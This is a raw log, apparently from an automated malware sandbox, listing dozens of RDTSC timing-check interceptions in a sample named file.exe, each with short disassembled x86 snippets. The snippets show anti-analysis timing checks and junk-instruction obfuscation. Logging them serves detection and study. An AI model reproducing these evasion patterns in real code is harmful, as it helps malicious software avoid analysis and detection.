Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15F31 second address: A15F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F44646ECA46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A16197 second address: A1619D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15F3E second address: A15F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1619D second address: A161C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4465131BC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F4465131BD5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A161C4 second address: A161C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17469 second address: A1746E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1BC41 second address: A1BC48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1BD3A second address: A1BD3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBB5 second address: A1DBCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBCB second address: A1DBD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBD1 second address: A1DBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1EBC2 second address: A1EBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b sub dword ptr [ebp+1244E893h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F4465131BC8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push eax 0x0000002e pushad 0x0000002f pushad 0x00000030 push esi 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DD23 second address: A1DD27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1EBFB second address: A1EC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21A26 second address: A21A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F44646ECA46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21C17 second address: A21C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4465131BC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22BEB second address: A22BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24AAA second address: A24AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24AAF second address: A24AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25C10 second address: A25C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23B70 second address: A23B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26D7C second address: A26D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A27BF4 second address: A27BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26D82 second address: A26D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A27DBF second address: A27DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A28EDC second address: A28EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A28EE0 second address: A28EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29D9A second address: A29DA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29DA3 second address: A29DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 mov di, 64CCh 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push esi 0x00000013 mov dword ptr [ebp+1246299Bh], ebx 0x00000019 pop edi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov bx, cx 0x00000024 mov eax, dword ptr [ebp+122D0DF9h] 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F44646ECA48h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 push FFFFFFFFh 0x00000046 nop 0x00000047 pushad 0x00000048 push esi 0x00000049 jo 00007F44646ECA46h 0x0000004f pop esi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29DFC second address: A29E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2AEA9 second address: A2AEAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36BC0 second address: A36BD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36DFB second address: 85FBFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F44646ECA46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 477D4387h 0x00000015 jmp 00007F44646ECA53h 0x0000001a push dword ptr [ebp+122D1249h] 0x00000020 cld 0x00000021 call dword ptr [ebp+122D1DB4h] 0x00000027 pushad 0x00000028 or dword ptr [ebp+122D1FF1h], ecx 0x0000002e xor eax, eax 0x00000030 jp 00007F44646ECA59h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a stc 0x0000003b mov dword ptr [ebp+122D2CE4h], eax 0x00000041 mov dword ptr [ebp+122D1D8Fh], eax 0x00000047 mov esi, 0000003Ch 0x0000004c sub dword ptr [ebp+122D2593h], ebx 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 jmp 00007F44646ECA58h 0x0000005b cmc 0x0000005c lodsw 0x0000005e jmp 00007F44646ECA4Eh 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 pushad 0x00000068 mov dword ptr [ebp+122D1FF1h], ebx 0x0000006e mov ah, E4h 0x00000070 popad 0x00000071 jns 00007F44646ECA47h 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D24C0h], edi 0x00000081 nop 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CB032 second address: 9CB04C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4465131BD6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CB04C second address: 9CB052 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DF42 second address: A3DF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DF46 second address: A3DF83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F44646ECA53h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F44646ECA4Fh 0x00000014 jmp 00007F44646ECA51h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E12D second address: A3E158 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4465131BC6h 0x00000008 jo 00007F4465131BC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F4465131BD4h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E2F9 second address: A3E301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E447 second address: A3E44D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E85D second address: A3E863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E863 second address: A3E86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E86C second address: A3E872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E872 second address: A3E8CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F4465131BD0h 0x0000000e pop edi 0x0000000f push ecx 0x00000010 ja 00007F4465131BC6h 0x00000016 pop ecx 0x00000017 popad 0x00000018 pushad 0x00000019 jns 00007F4465131BF0h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EB6E second address: A3EB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnp 00007F44646ECA46h 0x0000000f jg 00007F44646ECA46h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F44646ECA51h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EB97 second address: A3EBBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4465131BCCh 0x0000000e jno 00007F4465131BC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47964 second address: A47968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4683E second address: A46842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46842 second address: A4687D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F44646ECA52h 0x0000000d pushad 0x0000000e jmp 00007F44646ECA4Eh 0x00000013 jmp 00007F44646ECA50h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4687D second address: A46886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46886 second address: A46890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46890 second address: A468A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46BD8 second address: A46BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA53h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46BEF second address: A46C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F4465131BCFh 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 ja 00007F4465131BC8h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46C2A second address: A46C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46C30 second address: A46C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46C36 second address: A46C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46C40 second address: A46C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4465131BCBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46239 second address: A4623E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4623E second address: A46277 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4465131BDDh 0x00000008 jmp 00007F4465131BD7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F4465131BD4h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46277 second address: A4627D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4627D second address: A4628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4465131BC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4628C second address: A46290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1383B second address: A1383F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A471F6 second address: A471FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A471FC second address: A47200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47200 second address: A47206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47206 second address: A47211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4465131BC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47211 second address: A47217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0FA36 second address: 9F8331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jl 00007F4465131BC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F4465131BC8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub ecx, 0D2EC659h 0x00000031 lea eax, dword ptr [ebp+12483776h] 0x00000037 mov edi, dword ptr [ebp+122D205Bh] 0x0000003d nop 0x0000003e push edx 0x0000003f push eax 0x00000040 push eax 0x00000041 pop eax 0x00000042 pop eax 0x00000043 pop edx 0x00000044 push eax 0x00000045 jmp 00007F4465131BD4h 0x0000004a nop 0x0000004b and edx, 5AFFDC8Dh 0x00000051 call dword ptr [ebp+122D1FAEh] 0x00000057 pushad 0x00000058 jmp 00007F4465131BCBh 0x0000005d jmp 00007F4465131BD6h 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 jnl 00007F4465131BC6h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0FB74 second address: A0FB7E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F44646ECA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1040D second address: A10413 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A108C9 second address: A108CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10AF9 second address: A10B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 push esi 0x0000000a sbb di, 418Bh 0x0000000f pop ecx 0x00000010 lea eax, dword ptr [ebp+124837BAh] 0x00000016 pushad 0x00000017 mov ebx, 56D99105h 0x0000001c mov ecx, 20A8614Eh 0x00000021 popad 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10B22 second address: A10B53 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F44646ECA58h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F44646ECA4Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10B53 second address: A10BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D2586h] 0x00000015 push esi 0x00000016 stc 0x00000017 pop ecx 0x00000018 lea eax, dword ptr [ebp+12483776h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F4465131BC8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov edx, dword ptr [ebp+122D2521h] 0x0000003e and cx, 42CFh 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 push ebx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 pop ebx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10BAE second address: 9F8E18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F44646ECA4Dh 0x00000010 nop 0x00000011 mov edx, 42523BD1h 0x00000016 call dword ptr [ebp+1244E8ADh] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jnc 00007F44646ECA46h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8E18 second address: 9F8E22 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8E22 second address: 9F8E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8E27 second address: 9F8E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4465131BC6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4465131BD0h 0x00000014 push ecx 0x00000015 jmp 00007F4465131BD8h 0x0000001a pushad 0x0000001b popad 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B439 second address: A4B456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F44646ECA57h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B456 second address: A4B478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F4465131BC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jp 00007F4465131BE0h 0x00000013 pushad 0x00000014 jo 00007F4465131BC6h 0x0000001a jne 00007F4465131BC6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B478 second address: A4B47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B5C5 second address: A4B5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4465131BC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4BA17 second address: A4BA30 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F44646ECA4Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4BA30 second address: A4BA36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4BA36 second address: A4BA3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
